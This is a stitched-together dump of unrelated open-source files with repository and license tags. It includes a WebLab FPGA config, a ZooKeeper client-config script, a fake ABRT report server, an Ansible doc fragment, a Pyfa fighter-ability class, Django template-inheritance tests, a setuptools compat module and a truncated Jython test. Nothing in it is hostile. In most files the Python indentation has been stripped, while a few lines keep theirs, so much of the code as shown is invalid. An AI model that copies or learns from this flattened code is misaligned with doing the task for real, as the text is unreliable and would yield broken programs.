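# identical encodings score 1.0 and disjoint ones score 0.0.
def _demoOverlapScore():
    a = numpy.array([1, 1, 0, 0])
    b = numpy.array([1, 0, 1, 0])
    score = (a & b).sum() / float(max(a.sum(), b.sum()))
    assert score == 0.5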
def _computeResetIndices(self):
return numpy.array(self.resets).nonzero()[0]
def _plot(self, data, title):
self.plt.plot(range(len(data)), data)
self._finishPlot(data, title)
def _finishPlot(self, data, title):
self.plt.title(title)
self.plt.xlim(0, len(data))
for i in self._computeResetIndices():
self.plt.axvline(i, color='black', alpha=0.5)
def _imshow(self, data, title, aspect='auto'):
self.plt.title(title)
self.plt.imshow(data,
cmap=self.cm.Greys,
interpolation="nearest",
aspect=aspect,
vmin=0,
vmax=1)
def _plotDistributions(self, data, title):
means = [numpy.mean(x) if len(x) else 0 for x in data]
maxs = [numpy.max(x) if len(x) else 0 for x in data]
self.plt.plot(range(len(data)), means, label='mean')
self.plt.plot(range(len(data)), maxs, label='max')
self.plt.legend(loc='lower right')
self._finishPlot(data, title)
if __name__ == "__main__":
agent = Agent()
Server(agent)
| agpl-3.0 |
morelab/weblabdeusto | server/launch/sample_balanced2_concurrent_experiments/main_machine/lab_and_experiment1/experiment48/server_config.py | 968 | 1526 | #!/usr/bin/env python
#-*-*- encoding: utf-8 -*-*-
weblab_xilinx_experiment_xilinx_device = 'FPGA'
weblab_xilinx_experiment_port_number = 1
# This should be something like this:
# import os as _os
# xilinx_home = _os.getenv('XILINX_HOME')
# if xilinx_home == None:
# if _os.name == 'nt':
# xilinx_home = r'C:\Program Files\Xilinx'
# elif _os.name == 'posix':
# xilinx_home = r"/home/nctrun/Xilinx"
#
# if _os.name == 'nt':
# xilinx_impact_full_path = [xilinx_home + r'\bin\nt\impact']
# elif _os.name == 'posix':
# xilinx_impact_full_path = [xilinx_home + r'/bin/lin/impact']
# But for testing we are going to fake it:
xilinx_home = "."
xilinx_impact_full_path = ["python","./tests/unit/weblab/experiment/devices/xilinx_impact/fake_impact.py" ]
xilinx_device_to_program = 'XilinxImpact' # 'JTagBlazer', 'DigilentAdept'
xilinx_device_to_send_commands = 'SerialPort' # 'HttpDevice'
digilent_adept_full_path = ["python","./test/unit/weblab/experiment/devices/digilent_adept/fake_digilent_adept.py" ]
digilent_adept_batch_content = """something with the variable $FILE"""
xilinx_http_device_ip_FPGA = "192.168.50.138"
xilinx_http_device_port_FPGA = 80
xilinx_http_device_app_FPGA = ""
xilinx_batch_content_FPGA = """setMode -bs
setCable -port auto
addDevice -position 1 -file $FILE
Program -p 1
exit
"""
# Though it is not really a FPGA, the webcam url var name depends on the device,
# specified above.
fpga_webcam_url = '''https://www.weblab.deusto.es/webcam/fpga0/image.jpg'''
| bsd-2-clause |
ahujamoh/seldon-server | scripts/zookeeper/set-client-config.py | 7 | 1898 | #!/usr/bin/env python
import sys, getopt, argparse
from kazoo.client import KazooClient
import json
def loadZookeeperOptions(opts,zk):
node = "/all_clients/"+opts['client']+"/offline/semvec"
if zk.exists(node):
data, stat = zk.get(node)
jStr = data.decode("utf-8")
print "Found zookeeper configuration:",jStr
j = json.loads(jStr)
for key in j:
opts[key] = j[key]
def activateModel(args,folder,zk):
node = "/all_clients/"+args.client+"/svtext"
print "Activating model in zookeper at node ",node," with data ",folder
if zk.exists(node):
zk.set(node,folder)
else:
zk.create(node,folder,makepath=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='set-client-config')
parser.add_argument('-z', '--zookeeper', help='zookeeper hosts', required=True)
parser.add_argument('--clientVariable', help='client variable name', default="$CLIENT")
args = parser.parse_args()
opts = vars(args)
zk = KazooClient(hosts=args.zookeeper)
zk.start()
for line in sys.stdin:
line = line.rstrip()
parts = line.split()
if len(parts) == 3 and not line.startswith("#"):
clients = parts[0].split(',')
node = parts[1]
value = parts[2]
print "--------------------------"
print parts[0],node,"->",value
for client in clients:
nodeClient = node.replace(args.clientVariable,client)
valueClient = value.replace(args.clientVariable,client)
print "----"
print nodeClient
print valueClient
if zk.exists(nodeClient):
zk.set(nodeClient,valueClient)
else:
zk.create(nodeClient,valueClient,makepath=True)
zk.stop()
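# Hedged usage sketch (hypothetical input, not from the original repo): each
# non-comment stdin line is "clients node value", with the client variable
# substituted per client, e.g.
#
#   echo "clientA,clientB /all_clients/$CLIENT/svtext /models/$CLIENT/latest" \
#     | python set-client-config.py -z localhost:2181
#
# would set /all_clients/clientA/svtext and /all_clients/clientB/svtext.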
| apache-2.0 |
mhabrnal/abrt | tests/runtests/abrt-cli-report-mantisbt/fakefaf.py | 6 | 1502 | #!/usr/bin/env python
# Single purpose HTTP server
# - accepts POST of ureport JSON and dumps it to a file
import sys
import json
import BaseHTTPServer, cgi
class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_POST(self):
# parse form data
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type'],
}
)
self.send_response(202)
self.send_header('Content-Type', 'application/json')
self.send_header('Connection', 'close')
self.end_headers()
if self.path == '/reports/new/':
ureport = json.load(form['file'].file)
with open(self.save_ureport, 'w') as fh:
json.dump(ureport, fh, indent=2)
response = {
'bthash': '691cf824e3e07457156125636e86c50279e29496',
'reported_to': [
{}
],
'result': False
}
else:
with open(self.save_ureport, 'w') as fh:
fh.write('{"invalid_request_path": "%s"}' % self.path)
return
json.dump(response, self.wfile, indent=2)
PORT = 12345
print "Serving at port", PORT
Handler.save_ureport = sys.argv[1] if len(sys.argv) > 1 else 'ureport.json'
httpd = BaseHTTPServer.HTTPServer(("127.0.0.1", PORT), Handler)
httpd.serve_forever()
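# Hedged usage sketch (hypothetical invocation): exercise the fake server
# with a multipart upload of a ureport, e.g.
#
#   python fakefaf.py /tmp/dump.json &
#   curl -F file=@ureport.json http://127.0.0.1:12345/reports/new/
#
# after which /tmp/dump.json holds the re-serialized ureport.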
| gpl-2.0 |
h3biomed/ansible | lib/ansible/plugins/doc_fragments/default_callback.py | 3 | 1911 | # -*- coding: utf-8 -*-
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
class ModuleDocFragment(object):
DOCUMENTATION = r'''
options:
display_skipped_hosts:
name: Show skipped hosts
description: "Toggle to control displaying skipped task/host results in a task"
type: bool
default: yes
env:
- name: DISPLAY_SKIPPED_HOSTS
deprecated:
why: environment variables without "ANSIBLE_" prefix are deprecated
version: "2.12"
alternatives: the "ANSIBLE_DISPLAY_SKIPPED_HOSTS" environment variable
- name: ANSIBLE_DISPLAY_SKIPPED_HOSTS
ini:
- key: display_skipped_hosts
section: defaults
display_ok_hosts:
name: Show 'ok' hosts
description: "Toggle to control displaying 'ok' task/host results in a task"
type: bool
default: yes
env:
- name: ANSIBLE_DISPLAY_OK_HOSTS
ini:
- key: display_ok_hosts
section: defaults
version_added: '2.7'
display_failed_stderr:
name: Use STDERR for failed and unreachable tasks
description: "Toggle to control whether failed and unreachable tasks are displayed to STDERR (vs. STDOUT)"
type: bool
default: no
env:
- name: ANSIBLE_DISPLAY_FAILED_STDERR
ini:
- key: display_failed_stderr
section: defaults
version_added: '2.7'
show_custom_stats:
name: Show custom stats
description: 'This adds the custom stats set via the set_stats plugin to the play recap'
type: bool
default: no
env:
- name: ANSIBLE_SHOW_CUSTOM_STATS
ini:
- key: show_custom_stats
section: defaults
'''
| gpl-3.0 |
pyfa-org/Pyfa | eos/saveddata/fighterAbility.py | 2 | 5835 | # ===============================================================================
# Copyright (C) 2010 Diego Duclos
#
# This file is part of eos.
#
# eos is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# eos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with eos. If not, see <http://www.gnu.org/licenses/>.
# ===============================================================================
from logbook import Logger
from sqlalchemy.orm import reconstructor
from eos.utils.stats import DmgTypes
pyfalog = Logger(__name__)
class FighterAbility:
# We aren't able to get data on the charges that can be stored with fighters. So we hardcode that data here, keyed
# with the fighter squadron role
NUM_SHOTS_MAPPING = {
1: 0, # Superiority fighter / Attack
2: 12, # Light fighter / Attack
4: 6, # Heavy fighter / Heavy attack
5: 3, # Heavy fighter / Long range attack
}
# Same as above
REARM_TIME_MAPPING = {
1: 0, # Superiority fighter / Attack
2: 4000, # Light fighter / Attack
4: 6000, # Heavy fighter / Heavy attack
5: 20000, # Heavy fighter / Long range attack
}
def __init__(self, effect):
"""Initialize from the program"""
self.__effect = effect
self.effectID = effect.ID if effect is not None else None
self.active = False
self.build()
@reconstructor
def init(self):
"""Initialize from the database"""
self.__effect = None
if self.effectID:
self.__effect = next((x for x in self.fighter.item.effects.values() if x.ID == self.effectID), None)
if self.__effect is None:
pyfalog.error("Effect (id: {0}) does not exist", self.effectID)
return
self.build()
def build(self):
pass
@property
def effect(self):
return self.__effect
@property
def name(self):
return self.__effect.getattr('displayName') or self.__effect.name
@property
def attrPrefix(self):
return self.__effect.getattr('prefix')
@property
def dealsDamage(self):
attr = "{}DamageMultiplier".format(self.attrPrefix)
return attr in self.fighter.itemModifiedAttributes or self.fighter.charge is not None
@property
def grouped(self):
# is the ability applied per fighter (webs, returns False), or as a group (MWD, returned True)
return self.__effect.getattr('grouped')
@property
def hasCharges(self):
return self.__effect.getattr('hasCharges')
@property
def reloadTime(self):
return self.getReloadTime()
def getReloadTime(self, spentShots=None):
if spentShots is not None:
spentShots = max(self.numShots, spentShots)
else:
spentShots = self.numShots
rearm_time = (self.REARM_TIME_MAPPING[self.fighter.getModifiedItemAttr("fighterSquadronRole")] or 0 if self.hasCharges else 0)
return self.fighter.getModifiedItemAttr("fighterRefuelingTime") + rearm_time * spentShots
@property
def numShots(self):
return self.NUM_SHOTS_MAPPING[self.fighter.getModifiedItemAttr("fighterSquadronRole")] or 0 if self.hasCharges else 0
@property
def cycleTime(self):
speed = self.fighter.getModifiedItemAttr("{}Duration".format(self.attrPrefix))
return speed
def getVolley(self, targetProfile=None):
if not self.dealsDamage or not self.active:
return DmgTypes(0, 0, 0, 0)
if self.attrPrefix == "fighterAbilityLaunchBomb":
em = self.fighter.getModifiedChargeAttr("emDamage", 0)
therm = self.fighter.getModifiedChargeAttr("thermalDamage", 0)
kin = self.fighter.getModifiedChargeAttr("kineticDamage", 0)
exp = self.fighter.getModifiedChargeAttr("explosiveDamage", 0)
else:
em = self.fighter.getModifiedItemAttr("{}DamageEM".format(self.attrPrefix), 0)
therm = self.fighter.getModifiedItemAttr("{}DamageTherm".format(self.attrPrefix), 0)
kin = self.fighter.getModifiedItemAttr("{}DamageKin".format(self.attrPrefix), 0)
exp = self.fighter.getModifiedItemAttr("{}DamageExp".format(self.attrPrefix), 0)
dmgMult = self.fighter.amount * self.fighter.getModifiedItemAttr("{}DamageMultiplier".format(self.attrPrefix), 1)
volley = DmgTypes(
em=em * dmgMult * (1 - getattr(targetProfile, "emAmount", 0)),
thermal=therm * dmgMult * (1 - getattr(targetProfile, "thermalAmount", 0)),
kinetic=kin * dmgMult * (1 - getattr(targetProfile, "kineticAmount", 0)),
explosive=exp * dmgMult * (1 - getattr(targetProfile, "explosiveAmount", 0)))
return volley
def getDps(self, targetProfile=None, cycleTimeOverride=None):
volley = self.getVolley(targetProfile=targetProfile)
if not volley:
return DmgTypes(0, 0, 0, 0)
cycleTime = cycleTimeOverride if cycleTimeOverride is not None else self.cycleTime
dpsFactor = 1 / (cycleTime / 1000)
dps = DmgTypes(
em=volley.em * dpsFactor,
thermal=volley.thermal * dpsFactor,
kinetic=volley.kinetic * dpsFactor,
explosive=volley.explosive * dpsFactor)
return dps
def clear(self):
pass
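# A minimal, self-contained sketch (not part of the original module) of the
# volley -> DPS arithmetic used by getVolley()/getDps() above. All numbers are
# hypothetical: a 4000 ms cycle, a 100-point EM volley per fighter, 9 fighters
# in the squadron, and 25% EM resistance on the target profile.
if __name__ == '__main__':
    base_em = 100.0
    amount = 9
    resist = 0.25
    cycle_time_ms = 4000.0
    volley_em = base_em * amount * (1 - resist)         # 675.0 damage per volley
    dps_em = volley_em * (1 / (cycle_time_ms / 1000))   # 168.75 damage per second
    print('volley={0} dps={1}'.format(volley_em, dps_em))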
| gpl-3.0 |
jallohm/django | tests/template_tests/syntax_tests/test_extends.py | 83 | 15481 | from django.test import SimpleTestCase
from ..utils import setup
inheritance_templates = {
'inheritance01': "1{% block first %}&{% endblock %}3{% block second %}_{% endblock %}",
'inheritance02': "{% extends 'inheritance01' %}"
"{% block first %}2{% endblock %}{% block second %}4{% endblock %}",
'inheritance03': "{% extends 'inheritance02' %}",
'inheritance04': "{% extends 'inheritance01' %}",
'inheritance05': "{% extends 'inheritance02' %}",
'inheritance06': "{% extends foo %}",
'inheritance07': "{% extends 'inheritance01' %}{% block second %}5{% endblock %}",
'inheritance08': "{% extends 'inheritance02' %}{% block second %}5{% endblock %}",
'inheritance09': "{% extends 'inheritance04' %}",
'inheritance10': "{% extends 'inheritance04' %} ",
'inheritance11': "{% extends 'inheritance04' %}"
"{% block first %}2{% endblock %}{% block second %}4{% endblock %}",
'inheritance12': "{% extends 'inheritance07' %}{% block first %}2{% endblock %}",
'inheritance13': "{% extends 'inheritance02' %}"
"{% block first %}a{% endblock %}{% block second %}b{% endblock %}",
'inheritance14': "{% extends 'inheritance01' %}{% block newblock %}NO DISPLAY{% endblock %}",
'inheritance15': "{% extends 'inheritance01' %}"
"{% block first %}2{% block inner %}inner{% endblock %}{% endblock %}",
'inheritance16': "{% extends 'inheritance15' %}{% block inner %}out{% endblock %}",
'inheritance17': "{% load testtags %}{% block first %}1234{% endblock %}",
'inheritance18': "{% load testtags %}{% echo this that theother %}5678",
'inheritance19': "{% extends 'inheritance01' %}"
"{% block first %}{% load testtags %}{% echo 400 %}5678{% endblock %}",
'inheritance20': "{% extends 'inheritance01' %}{% block first %}{{ block.super }}a{% endblock %}",
'inheritance21': "{% extends 'inheritance02' %}{% block first %}{{ block.super }}a{% endblock %}",
'inheritance22': "{% extends 'inheritance04' %}{% block first %}{{ block.super }}a{% endblock %}",
'inheritance23': "{% extends 'inheritance20' %}{% block first %}{{ block.super }}b{% endblock %}",
'inheritance24': "{% extends context_template %}"
"{% block first %}2{% endblock %}{% block second %}4{% endblock %}",
'inheritance25': "{% extends context_template.1 %}"
"{% block first %}2{% endblock %}{% block second %}4{% endblock %}",
'inheritance26': "no tags",
'inheritance27': "{% extends 'inheritance26' %}",
'inheritance 28': "{% block first %}!{% endblock %}",
'inheritance29': "{% extends 'inheritance 28' %}",
'inheritance30': "1{% if optional %}{% block opt %}2{% endblock %}{% endif %}3",
'inheritance31': "{% extends 'inheritance30' %}{% block opt %}two{% endblock %}",
'inheritance32': "{% extends 'inheritance30' %}{% block opt %}two{% endblock %}",
'inheritance33': "1{% if optional == 1 %}{% block opt %}2{% endblock %}{% endif %}3",
'inheritance34': "{% extends 'inheritance33' %}{% block opt %}two{% endblock %}",
'inheritance35': "{% extends 'inheritance33' %}{% block opt %}two{% endblock %}",
'inheritance36': "{% for n in numbers %}_{% block opt %}{{ n }}{% endblock %}{% endfor %}_",
'inheritance37': "{% extends 'inheritance36' %}{% block opt %}X{% endblock %}",
'inheritance38': "{% extends 'inheritance36' %}{% block opt %}X{% endblock %}",
'inheritance39': "{% extends 'inheritance30' %}{% block opt %}new{{ block.super }}{% endblock %}",
'inheritance40': "{% extends 'inheritance33' %}{% block opt %}new{{ block.super }}{% endblock %}",
'inheritance41': "{% extends 'inheritance36' %}{% block opt %}new{{ block.super }}{% endblock %}",
'inheritance42': "{% extends 'inheritance02'|cut:' ' %}",
}
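# Illustrative note (not part of the original file): rendering 'inheritance02'
# fills the '&' and '_' blocks of 'inheritance01' with '2' and '4', so the
# expected output is '1234' -- the pattern most of the assertions below follow.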
class InheritanceTests(SimpleTestCase):
libraries = {'testtags': 'template_tests.templatetags.testtags'}
@setup(inheritance_templates)
def test_inheritance01(self):
"""
Standard template with no inheritance
"""
output = self.engine.render_to_string('inheritance01')
self.assertEqual(output, '1&3_')
@setup(inheritance_templates)
def test_inheritance02(self):
"""
Standard two-level inheritance
"""
output = self.engine.render_to_string('inheritance02')
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance03(self):
"""
Three-level with no redefinitions on third level
"""
output = self.engine.render_to_string('inheritance03')
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance04(self):
"""
Two-level with no redefinitions on second level
"""
output = self.engine.render_to_string('inheritance04')
self.assertEqual(output, '1&3_')
@setup(inheritance_templates)
def test_inheritance05(self):
"""
Two-level with double quotes instead of single quotes
"""
output = self.engine.render_to_string('inheritance05')
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance06(self):
"""
Three-level with variable parent-template name
"""
output = self.engine.render_to_string('inheritance06', {'foo': 'inheritance02'})
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance07(self):
"""
Two-level with one block defined, one block not defined
"""
output = self.engine.render_to_string('inheritance07')
self.assertEqual(output, '1&35')
@setup(inheritance_templates)
def test_inheritance08(self):
"""
Three-level with one block defined on this level, two blocks
defined next level
"""
output = self.engine.render_to_string('inheritance08')
self.assertEqual(output, '1235')
@setup(inheritance_templates)
def test_inheritance09(self):
"""
Three-level with second and third levels blank
"""
output = self.engine.render_to_string('inheritance09')
self.assertEqual(output, '1&3_')
@setup(inheritance_templates)
def test_inheritance10(self):
"""
Three-level with space NOT in a block -- should be ignored
"""
output = self.engine.render_to_string('inheritance10')
self.assertEqual(output, '1&3_')
@setup(inheritance_templates)
def test_inheritance11(self):
"""
Three-level with both blocks defined on this level, but none on
second level
"""
output = self.engine.render_to_string('inheritance11')
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance12(self):
"""
Three-level with this level providing one and second level
providing the other
"""
output = self.engine.render_to_string('inheritance12')
self.assertEqual(output, '1235')
@setup(inheritance_templates)
def test_inheritance13(self):
"""
Three-level with this level overriding second level
"""
output = self.engine.render_to_string('inheritance13')
self.assertEqual(output, '1a3b')
@setup(inheritance_templates)
def test_inheritance14(self):
"""
A block defined only in a child template shouldn't be displayed
"""
output = self.engine.render_to_string('inheritance14')
self.assertEqual(output, '1&3_')
@setup(inheritance_templates)
def test_inheritance15(self):
"""
A block within another block
"""
output = self.engine.render_to_string('inheritance15')
self.assertEqual(output, '12inner3_')
@setup(inheritance_templates)
def test_inheritance16(self):
"""
A block within another block (level 2)
"""
output = self.engine.render_to_string('inheritance16')
self.assertEqual(output, '12out3_')
@setup(inheritance_templates)
def test_inheritance17(self):
"""
{% load %} tag (parent -- setup for exception04)
"""
output = self.engine.render_to_string('inheritance17')
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance18(self):
"""
{% load %} tag (standard usage, without inheritance)
"""
output = self.engine.render_to_string('inheritance18')
self.assertEqual(output, 'this that theother5678')
@setup(inheritance_templates)
def test_inheritance19(self):
"""
{% load %} tag (within a child template)
"""
output = self.engine.render_to_string('inheritance19')
self.assertEqual(output, '140056783_')
@setup(inheritance_templates)
def test_inheritance20(self):
"""
Two-level inheritance with {{ block.super }}
"""
output = self.engine.render_to_string('inheritance20')
self.assertEqual(output, '1&a3_')
@setup(inheritance_templates)
def test_inheritance21(self):
"""
Three-level inheritance with {{ block.super }} from parent
"""
output = self.engine.render_to_string('inheritance21')
self.assertEqual(output, '12a34')
@setup(inheritance_templates)
def test_inheritance22(self):
"""
Three-level inheritance with {{ block.super }} from grandparent
"""
output = self.engine.render_to_string('inheritance22')
self.assertEqual(output, '1&a3_')
@setup(inheritance_templates)
def test_inheritance23(self):
"""
Three-level inheritance with {{ block.super }} from parent and
grandparent
"""
output = self.engine.render_to_string('inheritance23')
self.assertEqual(output, '1&ab3_')
@setup(inheritance_templates)
def test_inheritance24(self):
"""
Inheritance from local context without use of template loader
"""
context_template = self.engine.from_string("1{% block first %}_{% endblock %}3{% block second %}_{% endblock %}")
output = self.engine.render_to_string('inheritance24', {'context_template': context_template})
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance25(self):
"""
Inheritance from local context with variable parent template
"""
context_template = [
self.engine.from_string("Wrong"),
self.engine.from_string("1{% block first %}_{% endblock %}3{% block second %}_{% endblock %}"),
]
output = self.engine.render_to_string('inheritance25', {'context_template': context_template})
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance26(self):
"""
Set up a base template to extend
"""
output = self.engine.render_to_string('inheritance26')
self.assertEqual(output, 'no tags')
@setup(inheritance_templates)
def test_inheritance27(self):
"""
Inheritance from a template that doesn't have any blocks
"""
output = self.engine.render_to_string('inheritance27')
self.assertEqual(output, 'no tags')
@setup(inheritance_templates)
def test_inheritance_28(self):
"""
Set up a base template with a space in it.
"""
output = self.engine.render_to_string('inheritance 28')
self.assertEqual(output, '!')
@setup(inheritance_templates)
def test_inheritance29(self):
"""
Inheritance from a template with a space in its name should work.
"""
output = self.engine.render_to_string('inheritance29')
self.assertEqual(output, '!')
@setup(inheritance_templates)
def test_inheritance30(self):
"""
Base template, putting block in a conditional {% if %} tag
"""
output = self.engine.render_to_string('inheritance30', {'optional': True})
self.assertEqual(output, '123')
# Inherit from a template with block wrapped in an {% if %} tag
# (in parent), still gets overridden
@setup(inheritance_templates)
def test_inheritance31(self):
output = self.engine.render_to_string('inheritance31', {'optional': True})
self.assertEqual(output, '1two3')
@setup(inheritance_templates)
def test_inheritance32(self):
output = self.engine.render_to_string('inheritance32')
self.assertEqual(output, '13')
@setup(inheritance_templates)
def test_inheritance33(self):
"""
Base template, putting block in a conditional {% if %} tag
"""
output = self.engine.render_to_string('inheritance33', {'optional': 1})
self.assertEqual(output, '123')
@setup(inheritance_templates)
def test_inheritance34(self):
"""
Inherit from a template with block wrapped in an {% if %} tag
(in parent), still gets overridden
"""
output = self.engine.render_to_string('inheritance34', {'optional': 1})
self.assertEqual(output, '1two3')
@setup(inheritance_templates)
def test_inheritance35(self):
"""
Inherit from a template with block wrapped in an {% if %} tag
(in parent), still gets overridden
"""
output = self.engine.render_to_string('inheritance35', {'optional': 2})
self.assertEqual(output, '13')
@setup(inheritance_templates)
def test_inheritance36(self):
"""
Base template, putting block in a {% for %} tag
"""
output = self.engine.render_to_string('inheritance36', {'numbers': '123'})
self.assertEqual(output, '_1_2_3_')
@setup(inheritance_templates)
def test_inheritance37(self):
"""
Inherit from a template with block wrapped in an {% for %} tag
(in parent), still gets overridden
"""
output = self.engine.render_to_string('inheritance37', {'numbers': '123'})
self.assertEqual(output, '_X_X_X_')
@setup(inheritance_templates)
def test_inheritance38(self):
"""
Inherit from a template with block wrapped in an {% for %} tag
(in parent), still gets overridden
"""
output = self.engine.render_to_string('inheritance38')
self.assertEqual(output, '_')
# The super block will still be found.
@setup(inheritance_templates)
def test_inheritance39(self):
output = self.engine.render_to_string('inheritance39', {'optional': True})
self.assertEqual(output, '1new23')
@setup(inheritance_templates)
def test_inheritance40(self):
output = self.engine.render_to_string('inheritance40', {'optional': 1})
self.assertEqual(output, '1new23')
@setup(inheritance_templates)
def test_inheritance41(self):
output = self.engine.render_to_string('inheritance41', {'numbers': '123'})
self.assertEqual(output, '_new1_new2_new3_')
@setup(inheritance_templates)
def test_inheritance42(self):
"""
Expression starting and ending with a quote
"""
output = self.engine.render_to_string('inheritance42')
self.assertEqual(output, '1234')
| bsd-3-clause |
adobecs5/urp2015 | lib/python3.4/site-packages/setuptools/compat.py | 456 | 2094 | import sys
import itertools
PY3 = sys.version_info >= (3,)
PY2 = not PY3
if PY2:
basestring = basestring
import __builtin__ as builtins
import ConfigParser
from StringIO import StringIO
BytesIO = StringIO
func_code = lambda o: o.func_code
func_globals = lambda o: o.func_globals
im_func = lambda o: o.im_func
from htmlentitydefs import name2codepoint
import httplib
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
from BaseHTTPServer import BaseHTTPRequestHandler
iteritems = lambda o: o.iteritems()
long_type = long
maxsize = sys.maxint
unichr = unichr
unicode = unicode
bytes = str
from urllib import url2pathname, splittag, pathname2url
import urllib2
from urllib2 import urlopen, HTTPError, URLError, unquote, splituser
from urlparse import urlparse, urlunparse, urljoin, urlsplit, urlunsplit
filterfalse = itertools.ifilterfalse
exec("""def reraise(tp, value, tb=None):
raise tp, value, tb""")
if PY3:
basestring = str
import builtins
import configparser as ConfigParser
from io import StringIO, BytesIO
func_code = lambda o: o.__code__
func_globals = lambda o: o.__globals__
im_func = lambda o: o.__func__
from html.entities import name2codepoint
import http.client as httplib
from http.server import HTTPServer, SimpleHTTPRequestHandler
from http.server import BaseHTTPRequestHandler
iteritems = lambda o: o.items()
long_type = int
maxsize = sys.maxsize
unichr = chr
unicode = str
bytes = bytes
from urllib.error import HTTPError, URLError
import urllib.request as urllib2
from urllib.request import urlopen, url2pathname, pathname2url
from urllib.parse import (
urlparse, urlunparse, unquote, splituser, urljoin, urlsplit,
urlunsplit, splittag,
)
filterfalse = itertools.filterfalse
def reraise(tp, value, tb=None):
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
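# Hedged usage sketch (not in the original module): reraise() re-throws an
# exception with its original traceback on both Python 2 and 3, e.g.:
#
#     try:
#         1 / 0
#     except ZeroDivisionError:
#         tp, value, tb = sys.exc_info()
#         reraise(tp, value, tb)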
| apache-2.0 |
pgleeson/TestArea | lib/jython/Lib/test/test_cl.py | 31 | 3929 | #! /usr/bin/env python
"""Whimpy test script for the cl module
Roger E. Masse
"""
import cl
from test.test_support import verbose
clattrs = ['ADDED_ALGORITHM_ERROR', 'ALAW', 'ALGORITHM_ID',
'ALGORITHM_VERSION', 'AUDIO', 'AWARE_ERROR', 'AWARE_MPEG_AUDIO',
'AWARE_MULTIRATE', 'AWCMP_CONST_QUAL', 'AWCMP_FIXED_RATE',
'AWCMP_INDEPENDENT', 'AWCMP_JOINT_STEREO', 'AWCMP_LOSSLESS',
'AWCMP_MPEG_LAYER_I', 'AWCMP_MPEG_LAYER_II', 'AWCMP_STEREO',
'Algorithm', 'AlgorithmNumber', 'AlgorithmType', 'AudioFormatName',
'BAD_ALGORITHM_NAME', 'BAD_ALGORITHM_TYPE', 'BAD_BLOCK_SIZE',
'BAD_BOARD', 'BAD_BUFFERING', 'BAD_BUFFERLENGTH_NEG',
'BAD_BUFFERLENGTH_ODD', 'BAD_BUFFER_EXISTS', 'BAD_BUFFER_HANDLE',
'BAD_BUFFER_POINTER', 'BAD_BUFFER_QUERY_SIZE', 'BAD_BUFFER_SIZE',
'BAD_BUFFER_SIZE_POINTER', 'BAD_BUFFER_TYPE',
'BAD_COMPRESSION_SCHEME', 'BAD_COMPRESSOR_HANDLE',
'BAD_COMPRESSOR_HANDLE_POINTER', 'BAD_FRAME_SIZE',
'BAD_FUNCTIONALITY', 'BAD_FUNCTION_POINTER', 'BAD_HEADER_SIZE',
'BAD_INITIAL_VALUE', 'BAD_INTERNAL_FORMAT', 'BAD_LICENSE',
'BAD_MIN_GT_MAX', 'BAD_NO_BUFFERSPACE', 'BAD_NUMBER_OF_BLOCKS',
'BAD_PARAM', 'BAD_PARAM_ID_POINTER', 'BAD_PARAM_TYPE', 'BAD_POINTER',
'BAD_PVBUFFER', 'BAD_SCHEME_POINTER', 'BAD_STREAM_HEADER',
'BAD_STRING_POINTER', 'BAD_TEXT_STRING_PTR', 'BEST_FIT',
'BIDIRECTIONAL', 'BITRATE_POLICY', 'BITRATE_TARGET',
'BITS_PER_COMPONENT', 'BLENDING', 'BLOCK_SIZE', 'BOTTOM_UP',
'BUFFER_NOT_CREATED', 'BUF_DATA', 'BUF_FRAME', 'BytesPerPixel',
'BytesPerSample', 'CHANNEL_POLICY', 'CHROMA_THRESHOLD', 'CODEC',
'COMPONENTS', 'COMPRESSED_BUFFER_SIZE', 'COMPRESSION_RATIO',
'COMPRESSOR', 'CONTINUOUS_BLOCK', 'CONTINUOUS_NONBLOCK',
'CompressImage', 'DATA', 'DECOMPRESSOR', 'DecompressImage',
'EDGE_THRESHOLD', 'ENABLE_IMAGEINFO', 'END_OF_SEQUENCE', 'ENUM_VALUE',
'EXACT_COMPRESSION_RATIO', 'EXTERNAL_DEVICE', 'FLOATING_ENUM_VALUE',
'FLOATING_RANGE_VALUE', 'FRAME', 'FRAME_BUFFER_SIZE',
'FRAME_BUFFER_SIZE_ZERO', 'FRAME_RATE', 'FRAME_TYPE', 'G711_ALAW',
'G711_ULAW', 'GRAYSCALE', 'GetAlgorithmName', 'HDCC',
'HDCC_SAMPLES_PER_TILE', 'HDCC_TILE_THRESHOLD', 'HEADER_START_CODE',
'IMAGE_HEIGHT', 'IMAGE_WIDTH', 'INTERNAL_FORMAT',
'INTERNAL_IMAGE_HEIGHT', 'INTERNAL_IMAGE_WIDTH', 'INTRA', 'JPEG',
'JPEG_ERROR', 'JPEG_NUM_PARAMS', 'JPEG_QUALITY_FACTOR',
'JPEG_QUANTIZATION_TABLES', 'JPEG_SOFTWARE', 'JPEG_STREAM_HEADERS',
'KEYFRAME', 'LAST_FRAME_INDEX', 'LAYER', 'LUMA_THRESHOLD',
'MAX_NUMBER_OF_AUDIO_ALGORITHMS', 'MAX_NUMBER_OF_ORIGINAL_FORMATS',
'MAX_NUMBER_OF_PARAMS', 'MAX_NUMBER_OF_VIDEO_ALGORITHMS', 'MONO',
'MPEG_VIDEO', 'MVC1', 'MVC2', 'MVC2_BLENDING', 'MVC2_BLENDING_OFF',
